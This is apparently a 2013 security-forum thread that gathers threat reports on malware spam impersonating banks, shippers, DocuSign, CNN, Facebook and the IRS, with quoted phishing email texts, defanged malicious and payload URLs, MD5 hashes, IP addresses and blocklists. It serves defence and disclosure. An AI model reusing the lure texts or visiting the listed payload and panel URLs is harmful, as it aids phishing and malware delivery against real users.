SecureMessage.zip (01CC5CE52FC839EBCE6497FB88B1781F)
SecureMessage.exe (81129764C62417D5B06C73E6FAD838A5)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6d2504c920f55deff3dceeba953064e7/tumblr_inline_mqpdwp4v541qz4rgp.png
___
HSBC E-Advice Spam
- http://threattrack.tumblr.com/post/56785714666/hsbc-e-advice-spam
July 29, 2013 - "Subjects Seen:
HSBC E-Advice
Typical e-mail details:
Please find attached your Advice containing information on your transactions of last working day with the bank.
Please do not reply to this e-mail address. If you have any queries, please contact our Customer Services.
Yours faithfully
HSBC Bank
Malicious URLs
198.57.130.35 :8080/ponyb/gate.php
webmail.alsultantravel .info:8080/ponyb/gate.php
alsultantravel .com:8080/ponyb/gate.php
webmail.alsultantravel .com:8080/ponyb/gate.php
wx04.strato-wlh .de/EggT.exe
labycar .com/Zi6L.exe
208.112.50.5 /c38QVmd.exe
s148231503.onlinehome .us/y3R.exe
Malicious File Name and MD5:
HSBC_advice.zip (6C5A65A05E72ADFC64318E7730199192)
HSBC_advice.exe (E1DBB4BE2A7AE2180100A02C5E3E2D95)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fc7a33880c542d65b53e856f5b526fcc/tumblr_inline_mqpdol30Ux1qz4rgp.png
___
FedEx Shipment Notification Spam
- http://threattrack.tumblr.com/post/56791204438/fedex-shipment-notification-spam
July 29, 2013 - "Subjects Seen:
FedEx Shipment Notification
Typical e-mail details:
This tracking update has been requested and attached to this email
Reference information includes: Invoice number, Reference, Special handling/Services, Residential Delivery. Reference information is attached to this email.
Tracking number: <removed>
To track the latest status of your shipment, click on the tracking number above, or visit us at fedex .com...
This tracking update has been sent to you by FedEx on the behalf of the Requestor noted above. FedEx does not validate the authenticity of the requestor and does not validate, guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
Malicious File Name and MD5:
FedEx Notification.zip (7CFE2BE8E249E9A05664CB2E4BABD6AC)
FedEx Notification_.PDF.exe (E4EC9F6232A272EA76B65F94A86FF184)
FedEx Reference information.zip (F28D58D5CA4910495DBB786E8AC0E5D3)
FedEx Reference information.pdf.exe (CE23868B4F645A39CBB6AE98796346CB)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b7bb51169f2ce592c651e0bfc94a77d3/tumblr_inline_mqphqrDK0H1qz4rgp.png
___
DocuSign Confidential Company Agreement Spam
- http://threattrack.tumblr.com/post/56792357413/docusign-confidential-company-agreement-spam
July 29, 2013 - "Subjects Seen:
Completed: Please DocuSign this document : Confidential Company Agreement 2013..pdf
Typical e-mail details:
Your document has been completed
Sent on behalf of DocuSign Support.
All parties have completed the envelope ‘Please DocuSign this document: 2013 Company Contracts..pdf’.
To view, download or print the completed document click below.
View in DocuSign
Malicious URLs
thealphatechnologies .com/interlaces/index.html
digitalcaptive .net/chickpea/index.html
ftp(DOT)kirchdach .at/kimonos/index.html
webmail.alsultantravel .com:8080/ponyb/gate.php
happykiddoh .com/topic/able_disturb_planning.php
happykiddoh .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8a42f3172fb0f56ef786bba4c3dadf91/tumblr_inline_mqpiivHReI1qz4rgp.png
More here:
- https://www.virustotal.com/en-gb/ip-address/198.57.130.34/information/
"... domains resolved to the given IP address...
... Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset..."
___
Visa Recent Transactions Report Spam
- http://threattrack.tumblr.com/post/56814041368/visa-recent-transactions-report-spam
July 29, 2013 - "Subjects Seen:
VISA - Recent Transactions Report
Typical e-mail details:
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in possible fraudulent transactions. For security reasons the requested transactions were refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Augustus_Molina
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom
Malicious URLs
asam.atspace .eu/windsocks/index.html
deltaboatworks .net/adobe/update_flash_player.exe
deltaboatworks .net/topic/able_disturb_planning.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/11d58d2a23d6cb4fb5290dc8c499bc02/tumblr_inline_mqpvicYWPV1qz4rgp.png
:fear::mad::fear:
AplusWebMaster
2013-07-30, 20:02
FYI...
Fake CNN Angelina Jolie SPAM / deltadazeresort .net
- http://blog.dynamoo.com/2013/07/cnn-angelina-jolie-tops-list-of-highest.html
30 July 2013 - "This fake CNN spam leads to malware on deltadazeresort .net:
Date: Tue, 30 Jul 2013 17:52:54 +0330 [10:22:54 EDT]
From: CNN [BreakingNews @mail .cnn .com]
Subject: CNN: Forbes: Angelina Jolie tops list of highest-paid actresses
Forbes: Angelina Jolie tops list of highest-paid actresses
By Sheridan Watson, EW.com
July 29, 2013 -- Updated 2014 GMT (0414 HKT)
Agelina Jolie attends a June 2013 premiere of Brad Pitt's movie, "World War Z" ...
Screenshot: https://lh3.ggpht.com/-PEc8KASFfZ4/UffZuOm5_fI/AAAAAAAABo8/ek411jNZMr0/s400/jolie.png
The link in the email goes to a legitimate -hacked- site and then to one or more of three scripts:
[donotclick]00002nd.rcomhost .com/immanent/surfeit.js
[donotclick]theplaidfox .com/bulbs/falcon.js
[donotclick]sandbox.infotraxdevdocs .com/afforestation/provosts.js
From there the victim is sent to a landing page at [donotclick]deltadazeresort .net/topic/able_disturb_planning.php. At the time of writing this hijacked GoDaddy domain does not resolve, but it was recently hosted on the following IPs alongside these other hacked GoDaddy domains:
66.175.217.235 (Linode, US)
173.246.104.136 (Gandi, US) ..."
CNN Angelina Jolie Spam
- http://threattrack.tumblr.com/post/56879888289/cnn-angelina-jolie-spam
July 30, 2013 - "Subjects Seen:
CNN: Forbes: Angelina Jolie tops list of highest-paid actresses
Typical e-mail details:
(EW.com) — She might not get paid as much as “Iron Man," but there’s no doubt that celestial beauty Angelina Jolie is smiling all the way to the bank.
This year, Jolie topped Forbes’ annual list of the highest-paid actresses in Hollywood with an incredibly robust $33 million.
Malicious URLs
gbheatings .com/thou/index.html
casa-dor .com/bookstore/index.html
deltadazeresort .net/topic/able_disturb_planning.php
deltadazeresort .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dadfa9668184e4b6701b2f6b487022a8/tumblr_inline_mqr8k5iSDk1qz4rgp.png
___
Pharma sites to block 30/7/13
- http://blog.dynamoo.com/2013/07/pharma-sites-to-block-30713.html
30 July 2013 - "This IPs host (fake) pharma sites which seem to be associated with this gang* and share some of their infrastructure. As far as I can tell, none of them host malware.. but the IPs involved could be repurposed as malware servers and blocking them might be prudent...
Recommended blocklist:
88.190.218.27
91.199.149.0/24
91.200.13.0/24
91.204.162.81
91.204.162.96
94.152.188.165
94.242.239.4
109.107.203.45
192.162.19.0/24
198.23.59.79 ..."
(More listed at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Malware sites to block 30/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-30713.html
30 July 2013 - "These sites and IPs are associated with this gang*, and are either currently in use or they have been in use recently. The list has individual IPs and web hosts first, followed by a plain list of recommended items to block..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Fake Pinterest password SPAM / onsayoga .net
- http://blog.dynamoo.com/2013/07/your-password-on-pinterest-was.html
30 July 2013 - "This fake Pinterest spam leads to malware on onsayoga .net:
Date: Tue, 30 Jul 2013 11:17:28 -0500 [12:17:28 EDT]
From: Pinterest [caulksf8195 @customercare .pinterrest .net]
Subject: Your password on Pinterest was Successfully modified!
A Few Updates...
[redacted]
Changing your password is complete. Please use the link below within 24 hours. reset. Receive New Password to email.
Ask for a New Password
Pinterest is a tool for collecting and organizing things you love.
This email was sent to [redacted].
Screenshot: https://lh3.ggpht.com/-RA2Ds5rYUic/UfgEta3g9TI/AAAAAAAABpM/1ptRb_zTs_c/s400/pinterest.png
The link goes through a legitimate -hacked- site and then on to [donotclick]www .pinterest.com.onsayoga .net/news/pinterest-paswword-changes.php (report here*) which is hosted on the following IPs:
95.111.32.249 (Megalan EAD, Bulgaria)
122.128.109.46 (Ximbo / CPCnet, Hong Kong)
209.222.67.251 (Razor Inc, US)
These IPs are controlled by this gang** and form part of this large network*** of malicious IPs and domains. I recommend you use -that- list in conjunction with blocking onsayoga .net."
* http://urlquery.net/report.php?id=4226343
** http://blog.dynamoo.com/search/label/Amerika
*** http://blog.dynamoo.com/2013/07/malware-sites-to-block-30713.html
___
Fake eBay SPAM / deltamarineinspections .net
- http://blog.dynamoo.com/2013/07/ebay-ready-to-get-started-heres-how.html
30 July 2013 - "There is currently an eBay-themed "ready to get started? Here’s how" spam run active, effectively almost the same as this one*, except this time there is a new set of intermediate scripts and payload page. The three scripts** involved are:
[donotclick]03778d6.namesecurehost .com/meaningful/unsnapping.js
[donotclick]icontractor .org/followings/trolloped.js
[donotclick]tvassist .co .uk/plead/grueled.js
..leading to a payload page at [donotclick]deltamarineinspections .net/topic/able_disturb_planning.php on 66.175.217.235 (Linode, US). The domains in use are -hijacked- from a GoDaddy account and belong to the same poor sod that last control of the ones here***.
Recommended blocklist:
66.175.217.235
deltaboatraces .net
deltaboatworks .net
deltadazeresort .net
deltamarineinspections .net
deltarentalcenter .net
deltariverhouse .net
deltayachtclub .net ..."
* http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
** http://blog.dynamoo.com/search/label/ThreeScripts
*** http://blog.dynamoo.com/2013/07/cnn-angelina-jolie-tops-list-of-highest.html
___
Fake Facebook SPAM again / deltaoutriggercafe .com
- http://blog.dynamoo.com/2013/07/facebook-spam-deltaoutriggercafecom.html
30 July 2013 - "These guys are busy. This fake Facebook spam leads to malware on deltaoutriggercafe .com:
Date: Tue, 30 Jul 2013 15:05:25 -0500 [16:05:25 EDT]
From: Facebook [no-reply @facebook .com]
Subject: Issac Dyer wants to be friends with you on Facebook.
facebook
Issac Dyer wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request
See All Requests
This message was sent to [redacted]...
I don't know about you, but I think Isaac looks a bit like a girl:
> https://lh3.ggpht.com/-pCmjcU0ocQs/Ufgp_qXf_XI/AAAAAAAABpc/L5SzS_CfCVA/s1600/facebook.png
Predicatably, clicking on the link in the email leads to a legitimate hacked site and then the same redirector scripts found in this spam run*. However, in this case the target has now changed to [donotclick]deltaoutriggercafe .com/topic/able_disturb_planning.php which is hosted on 66.175.217.235 (Linode, US) along with a whole bunch of other similar domains that have been -hijacked- from GoDaddy.
Recommended blocklist:
66.175.217.235
deltaboatraces .net
deltaboatworks .net
deltadazeresort .net
deltamarineinspections .net
deltaoutriggercafe .com
deltarentalcenter .net
deltariverhouse .net
deltayachtclub .net ..."
* http://blog.dynamoo.com/2013/07/ebay-ready-to-get-started-heres-how.html
:fear::fear: :mad:
AplusWebMaster
2013-07-31, 18:54
FYI...
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Deposit Notification Email Messages - 2013 Jul 31
Fake Online Banking Software Security Update Email Messages [Trusteer] - 2013 Jul 31
Fake Customer Complaint Attachment Email Messages - 2013 Jul 31
Fake Product Services Specification Request Email Messages - 2013 Jul 31
(More detail and links at the cisco URL above.)
___
IRS Tax Payment Rejected Spam
- http://threattrack.tumblr.com/post/56980373227/irs-tax-payment-rejected-spam
July 31, 2013 - "Subjects Seen:
Your FED TAX payment ( ID : <removed> ) was Rejected
Typical e-mail details:
... Your federal Tax payment (ID: <removed>), recently sent from your checking account was returned by the your financial institution.
For more information, please visit the following link -eftps.com/eftps/payments/history/detail/view?eft=
Transaction Number: <removed>
Payment Amount: $ 7882.00
Transaction status: Rejected
ACH Trace Number: <removed>
Transaction Type: ACH Debit Payment-DDA
Malicious URLs
diyhomeimprovementtips .com/clunkier/index.html
ossjobs .com/tangled/index.html
singular-cy .com/throughout/index.html
deltaoutriggercafe .com/adobe/update_flash_player.exe
deltaoutriggercafe .com/topic/regard_alternate_sheet.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/72882cd7094d1051dbf5e33bf176a4e5/tumblr_inline_mqt7s5cWsD1qz4rgp.png
:fear::mad:
AplusWebMaster
2013-08-01, 16:24
FYI...
Pump and dump SPAM - Biostem ...
- http://blog.dynamoo.com/2013/08/pump-and-dump-spam-flogs-dead-horse.html
1 August 2013 - "About a month-and-a-half ago* I had a look at the pump-and-dump spam promoting Biostem U.S. Corporation (HAIR)** when it was trading at around $0.30. Surprisingly, the pump-and-dump spam is still ongoing which will make it nearly two months of spam on one single stock..
This Company Will Make an Impressive Recovery! It is the answer
to your portfolio troubles!
Date: August 1st
Long Term Target: .85
Per share price: .035
Ticker: HAI_R
Name: Biostem Corp.
You might want to sit down before reading this... Stocks To
Look At!
So, out of curiosity I schlepped across to look at their stock price and was slightly surprised to see that it has lost around 90% of its value since the spam run started. What happened? Well, on 19th July the stock price fell off a cliff when rather predictably Biostem announced that it was shutting up shop***, and looking at news reports there seems to be little chance of recovery.
Screenshot: https://lh3.ggpht.com/-itbe0rPDyM4/UfoPa4iKsjI/AAAAAAAABpw/CC1UsgfthSQ/s1600/biostem5.png
But now with shares bouncing along at around the 3 to 4 cents mark the pump-and-dump seems to be continuing, and since the collapse it appears that around 9.6 million shares have been traded, which is about 8.4% of the total equity. At today's prices those shares are worth about $336,000. A little over a year ago, on May 28th 2012, Biostem stock peaked at $439 per share, at close of business yesterday they were just 3.5 cents.. a 99.2% drop. Somebody has certainly taken a haircut on these stocks.. "
* http://blog.dynamoo.com/2013/06/hair-biostem-pump-and-dump-rakes-in.html
** http://www.nasdaq.com/symbol/hair
*** http://www.nasdaq.com/press-release/biostem-us-corporation-suspends-operations-20130717-01105
___
Current State of the Blackhole Exploit Kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/the-current-state-of-the-blackhole-exploit-kit/
July 31, 2013 9:42 pm (UTC-7) - "The Blackhole Exploit Kit is one of the most notorious exploit kits currently in circulation among the cybercriminal underground today. Thus, we continuously monitor for incidents and attacks involving the exploit kit itself. Last week we reported about the spam campaign leveraging the birth of Prince William’s and Kate Middleton’s son. Our analysis of the campaign yielded its connection to other currently-ongoing campaigns that used other recent news events, such as the controversy surrounding the upcoming movie Ender’s Game. Some of the other connected campaigns also used Facebook and eBay as lures to get users to click malicious links.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/bhekEbay1.jpg
The volume of spammed messages related to this spam run reached up to 0.8% of all spam messages collected during the time period — a relatively large percentage compared to other runs. We’ve also identified a list of countries that we detect where the bulk of the spam is coming from...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/newbhektable2.png
... These recent developments regarding this particular exploit kit can certainly be disconcerting, but nothing particularly new in regards to BHEK being used in new, unpredictable ways. What we can glean from this, however, is that even such an old approach is still effective in getting victims, which means that more users need to be protected about this threat... Infection can be avoided by extra vigilance by users on not clicking on the links that present themselves through suspicious mails such as these. Other precautions include: always installing the latest Java security update... and using a web reputation security product..."
___
UPS Package Pickup Spam
- http://threattrack.tumblr.com/post/57066116667/ups-package-pickup-spam
Aug. 1, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <removed> )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
bettersigns .net/ponyb/gate.php
50.57.185.72 :8080/ponyb/gate.php
arki .com :8080/ponyb/gate.php
web1w3.nfrance .com/bzfBGWP.exe
serw.myroitracking .com/kQYjoPqY.exe
442594-web1.youneedmedia .com/MM75.exe
ftp(DOT)jason-tooling .com/nhdx.exe
Malicious File Name and MD5:
UPS_Label_<date>.zip (199C2A4EED41CF642FBDDF60949A1DD3)
UPS-Label_<date>.exe (E1388381884E7434A0A559CAED63B677)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/130e7243c1c618647924df31a4aa1a7d/tumblr_inline_mquwubWDl91qz4rgp.png
:mad::fear:
AplusWebMaster
2013-08-02, 20:47
FYI...
Fake American Express Alerts
- https://isc.sans.edu/diary.html?storyid=16285
Last Updated: 2013-08-02 16:20:31 UTC - "Right now we are seeing -fake- American Express account alerts*. The alerts look very real, and will trick the user into clicking on a link that may lead to malware. As many of these attacks, the exact destination will heavily depend on the browser used. Antivirus does recognize the intermediate scripts as malicious and should warn the user if configured to inspect web content."
* https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-08-02%20at%2012_08_22%20PM.png
American Express Spending Notification Spam
- http://threattrack.tumblr.com/post/57162394091/american-express-spending-notification-spam
Aug. 2, 2013 - "Subjects Seen:
Account Alert: Recent Charge Approved
Typical e-mail details:
Dear Customer,
Spend Activity since your last statement close date has reached the notification amount you set for your account.
Malicious URLs
blackamber .net/ulnq.html
medialifegroup .com/~medialifeyerel/xkaq.html
drstephenlwolman .com/topic/sessions-folk-binds.php
northernforestcanoetrail .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d421937f12b9806905830a0ce4217497/tumblr_inline_mqwugv1PGc1qz4rgp.png
___
MoneyGram Payment Notification Spam
- http://threattrack.tumblr.com/post/57160949542/moneygram-payment-notification-spam
Aug. 2, 2013 - "Subjects Seen:
Payment notification email
Typical e-mail details:
Dear client!
You are receiving this notification because of you have been received the payment.
It may take a few moment for this transaction to appear in the Recent Activity list on your account page.
Payment details
Transaction sum: 950 USD
Transaction date: 2013/08/02
View the details of this transaction online
Thank you for using MoneyGram services!
Malicious URLs
blackamber .net/ulnq.html
medialifegroup .com/~medialifeyerel/xkaq.html
drstephenlwolman .com/topic/sessions-folk-binds.php
northernforestcanoetrail .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/838bfd89a16f2e7dd1df0382b56de84d/tumblr_inline_mqwtbf4BM61qz4rgp.png
___
NACHA Direct Deposit was Declined Spam
- http://threattrack.tumblr.com/post/57171844820/nacha-direct-deposit-was-declined-spam
2 August 2013 - "Subjects Seen:
Direct Deposit payment was declined
Typical e-mail details:
Attn: Chief Accountant
Please be informed, that your most recent Direct Deposit payment (<removed>) was cancelled,because your business software package was out of date. Please use the link below to enter the secure section of our web site and see the details::
Click here for more information
Please refer to your financial institution to obtain your updated version of the software needed.
Sincerely yours
ACH Network Rules Department
Malicious URLs
24-7datura .com/wp-sts.php?2HWU2JNHOTU80DVU
zippierearliest .in/closest/i9jfuhioejskveohnuojfir.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e56afd6f72353a44e2d67d9b351064e7/tumblr_inline_mqx0zsTrzI1qz4rgp.png
___
Fake Discover Card SPAM / capitalagreements .com
- http://blog.dynamoo.com/2013/08/your-most-recent-payment-has-been.html
2 August 2013 - "This fake Discover Card spam leads to malware on capitalagreements .com:
Date: Fri, 2 Aug 2013 20:41:09 +0200 [14:41:09 EDT]
From: Discover Card [dontrply .service.discovercard .com]
Reply-To: dontrply @service.discovercard .com
Discover
Access My Account
ACCOUNT CONFIRMATION Statements | Payments | Rewards
Your most recent payment has been processed.
Dear Customer,
This e-mail is to confirm that we have processed your most recent payment. Please remember to use your new information the next time you log in.
To view more details please click here.
Log In to review your account details or to make additional changes...
Screenshot: https://lh3.ggpht.com/-8026dlem4nw/UfwAlX00pnI/AAAAAAAABqk/FgzguSvT0yk/s1600/discover-card.png
The link in the email goes to a legitimate -hacked- site and then one to three scripts as follows:
[donotclick]ekaterini.mainsys .gr/overspreading/hermaphrodite.js
[donotclick]sisgroup .co .uk/despairs/marveled.js
[donotclick]psik.aplus .pl/christian/pickford.js
After that, the victim is directed to the malware landing page at [donotclick]capitalagreements .com/topic/regard_alternate_sheet.php which is a hijacked GoDaddy domain hosted on 66.228.60.243 (Linode, US), along with several other hijacked domains.
The attack is fundamentally the same as this American Express themed malspam run described here*.
Recommended blocklist:
66.228.60.243
northernforestcanoetrail .com
northforestcanoetrail .org
yourcaribbeanconnection .com
capitalagreements .com
buyfranklinrealty .com
franklinrealtyofcc .com
frccc. com
sellcitruscountyrealestate .com "
* http://techhelplist.com/index.php/spam-list/293-account-alert-recent-charge-approved-malware
:fear::mad:
AplusWebMaster
2013-08-11, 22:08
FYI...
Fake Apple Store Gift Card SPAM ...
- http://threattrack.tumblr.com/post/57701798476/apple-store-gift-card-spam
August 9, 2013 - "Subjects Seen:
Apple Store Gift Card
Typical e-mail details:
Apple Store Gift Card
Dear client! You got our $100 Apple Store Gift Card.
Apple Store Gift Cards can be applied to buy Apple hardware and accessories at any Apple Retail Store, the Apple Online Store,
or over the phone by calling 1-800-MY-APPLE.
Please follow the link or read the attachment to get the Apple Store Gift Card code.
Malicious URLs
kidscareinternationalschool .com/f2eyvyj.html
nsmontessoricenter .com/fz13t.html
stevecozz .com/topic/sessions-folk-binds.php
Malicious File Name and MD5:
GiftCard28493.zip (F4B3986EE1828BDCDD46EE412BE0BA61)
Apple gift card.exe (74CFF87704AEC030D7AD1171366AFF87)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c0c0ff5016c711df543d9a010a0a0525/tumblr_inline_mr7syuZiMr1qz4rgp.png
- http://blog.webroot.com/2013/08/09/fake-apple-store-gift-card-themed-emails-serve-client-side-exploits-and-malware/
August 9, 2013 - "Apple Store users, beware! A currently ongoing malicious spam campaign is attempting to trick users into thinking that they’ve successfully received a legitimate ‘Gift Card’ worth $200. What’s particularly interesting about this campaign is that the cybercriminal(s) behind it are mixing the infection vectors by relying on both a malicious attachment and a link to the same malware found in the malicious emails. Users can become infected by either executing the attachment or by clicking on the client-side exploits serving link found in the emails...
Sample screenshot of the spamvertised email:
> http://webrootblog.files.wordpress.com/2013/08/apple_store_fake_email_spam_malicious_gift_card_malware_exploits_malicious_software_social_engineering.png
... MD5: 74cff87704aec030d7ad1171366aff87 * ... UDS:DangerousObject.Multi.Generic; PWSZbot-FBX!74CFF87704AE.
... sampled client-side exploit: MD5: 91cb051d427bd7b679e1abc99983338e ** ... Mal/ExpJava-F..."
(More detail at the websense URL above.)
* https://www.virustotal.com/en/file/6edb372155e4f4ed37c47d6100cce836266674db1e502fd4ff9d7728ec52a794/analysis/
File name: Apple gift card.exe
Detection ratio: 24/44
Analysis date: 2013-08-09 14:03:28 UTC
** https://www.virustotal.com/en/file/d1d127d60ca94a8a1779c9d978c4eadfdd5dbb3683a87f2bd1cbc963b09a9a36/analysis/
File name: java-exploit-from-173.246.105.15.jar
Detection ratio: 4/45
Analysis date: 2013-08-11 05:11:11 UTC
- https://www.virustotal.com/en/ip-address/173.246.105.15/information/
Diagnostic page for AS29169 (GANDI-AS)
- http://google.com/safebrowsing/diagnostic?site=AS:29169
"... over the past 90 days, 204 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-08-12, and the last time suspicious content was found was on 2013-08-11... we found 12 site(s) on this network... that appeared to function as intermediaries for the infection of 71 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 91 site(s)... that infected 407 other site(s)..."
:mad::fear::mad:
AplusWebMaster
2013-08-12, 23:16
FYI...
Hack threatens outdated Joomla sites
- http://krebsonsecurity.com/2013/08/simple-hack-threatens-oudated-joomla-sites/
Aug. 12, 2012 - "If you run a site powered by the Joomla content management system and haven’t yet applied a critical update for this software released less than two weeks ago, please take a moment to do that: A trivial exploit could let users inject malicious content into your site, turning it into a phishing or malware trap for visitors. The patch* released on July 31, 2013 applies to Joomla 2.5.13 and earlier 2.5.x versions, as well as Joomla 3.1.4 and earlier 3.x versions... For sites powered by unsupported versions of Joomla (1.5.x, and a cursory Google search indicates that there are tens of thousands of these 1.5.x sites currently online), attackers do not even need to have an account on the Joomla server for this hack to work... Earlier this month, security firm Arbor Networks warned** that it was tracking a Web site botnet dubbed “Fort Disco” which was made up of hacked Joomla and WordPress sites. Earlier in the year, Web site security firm Incapsula*** said it had tracked more than 90,000 Web sites powered by WordPress that were backdoored with malicious code."
* http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads
** http://www.arbornetworks.com/asert/2013/08/fort-disco-bruteforce-campaign/
*** http://krebsonsecurity.com/2013/04/brute-force-attacks-build-wordpress-botnet/
- https://net-security.org/secworld.php?id=15407
14 August 2013
- https://secunia.com/advisories/54326/
Release Date: 2013-08-02
Where: From remote
Impact: System access
Solution Status: Vendor Patch
Software: Joomla! 2.x, 3.x
... vulnerability is confirmed in version 3.1.4 and reported in versions prior to 2.5.14 and 3.1.5.
Solution: Update to version 2.5.14 or 3.1.5 *
- https://atlas.arbor.net/briefs/index#-740710151
High Severity
August 16, 2013 23:24
Joomla is a hot target for attackers of varying motives. This recent security patch should be installed in order to reduce attacks.
Analysis: Thousands of compromised Joomla sites are currently being used in botnets and vulnerabilities like this make the attackers job even easier. The fact that this security hole was used to attack financial users in Europe, the Middle East and Asia and re-direct them to the popular Black Hole Exploit Kit is a testament to the criminal value of such security holes. Financial users mean money and bank accounts and other types of access so it is a smart attack on the part of the attackers but could be very damaging for any user that was out of date and subject to exploitation which could lead to installs of malware such as Zeus, P2P Zeus, Citadel or other banking malware.
Source: http://threatpost.com/joomla-patches-zero-day-targeting-emea-banks/101976
___
Virgin Media Bill Spam
- http://threattrack.tumblr.com/post/58065662184/virgin-media-bill-spam
Aug. 12, 2012 - "Subjects Seen:
Your Virgin Media bill is ready
Typical e-mail details:
Hello,
Your Virgin Media bill is ready and waiting for you.
Malicious File Name and MD5:
latest bill ref.<random>.pdf.zip (547845B4164A7029E19CB8D5FEC97234)
latest bill ref.<random>.pdf.exe (8D44660D20DF2A03DB9F1A981902A392)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e83a2bab34f1c1b08bfc5270fcda8876/tumblr_inline_mrfe9mPBWr1qz4rgp.png
___
Fake Facebook SPAM / guterhelmet .com
- http://blog.dynamoo.com/2013/08/facebook-spam-guterhelmetcom.html
12 August 2013 - "This fake Facebook spam leads to malware on guterhelmet .com:
Date: Mon, 12 Aug 2013 17:51:17 -0200 [15:51:17 EDT]
From: Facebook [update+zj433fgc2_aay @facebookmail .com]
Subject: Willie Powell wants to be friends with you on Facebook.
facebook
interesting pages on facebook
mark as favorite web pages that interest you to receive their updates in your news feed.
Willie Powell
Bao Aguliar
Bibi Akel
Eleanora Casella
Murray Carsten
Jordana Fiqueroa
Jona Fiorelli
Leisha Heape
Lacresha Hautala
Monnie Carrillo
Missy Carreiro
find more pages
go to facebook
the message was sent to {mailto_username} @ {mailto_domain}...
Is it me, or does everyone look the same?
> https://lh3.ggpht.com/-8Laq2BN98T8/Ugk_zRYHaqI/AAAAAAAABwY/b8u6XfspbSk/s1600/facebook3.png
... The link in the email goes through a legitimate -hacked- site and then on to one of three scripts:
[donotclick]golift .biz/lisps/seventeen.js
[donotclick]fh-efront .clickandlearn.at/parboiled/couplets.js
[donotclick]ftp.elotus .org/products/cleats.js
From there, the victim is -redirected- to a -hijacked- GoDaddy domain with a malicious payload at [donotclick]guterhelmet .com/topic/able_disturb_planning.php hosted on 192.81.135.132 (Linode, US) along with a number of other hijacked domains...
Recommended blocklist:
192.81.135.132
golift .biz
fh-efront.clickandlearn .at
ftp.elotus .org
guterglove .com
grandrapidsleaffilter .com
greenbayleaffilter .com
guterhelmet .com
guterprosva .com "
- https://www.virustotal.com/en/ip-address/192.81.135.132/information/
___
Gap between Google Play and AV vendors on adware classification
- http://research.zscaler.com/2013/08/normal-0-false-false-false-en-us-x-none_8.html
August 8, 2013 - "Two critical items impacting mobile use are privacy and a positive user experience. The mobile app market is built on trust. Questionable mobile advertising practices, such as apps employing deceptive adware practices, negatively impact the end user’s perception of both privacy and the user experience. Doing things like capturing personal information such as email addresses, device IDs, IMEIs, etc. without properly notifying users and modifying phone settings and desktops without consent, is annoying and unacceptable for mobile users. While the majority of mobile ads are not malicious, they are undesirable for most. Zscaler regularly analyzes applications in the Google Play store to profile apps and identify those presenting security and privacy risks. By studying this data, we have come up with some interesting statistics concerning the prevalence of ‘adware’ in apps permitted into the Google Play store... Why are AV vendors flagging a huge number of applications as adware while Google is freely permitting them into the Google Play store? The excessive use of advertisements can negatively impact customer privacy and result in a -negative- user experience. On the other hand, advertisements are necessary for app developers looking to earn money when providing free apps. So where should the line be drawn? Google has clearly chosen to be very -lenient- with aggressive advertising practices, while Apple has taken the opposite approach, as they have shown that they’re willing to sacrifice advertising revenue to provide a positive user experience, even restricting the ability of advertisers to track device IDs and MAC addresses. How do we define adware? We feel that adware exhibits one or more of the following intrusive behaviors without requesting appropriate user consent (ref- Lookout Blog*)..."
(More detail and graphic charts at the zscaler URL above.)
* https://blog.lookout.com/blog/2013/06/26/lookout-flags-newly-classified-adware/
___
Central Tibetan admin website strategically compromised as part of Watering Hole Attack
- https://www.securelist.com/en/blog/9144/Central_Tibetan_Administration_Website_Strategically_Compromised_as_Part_of_Watering_Hole_Attack
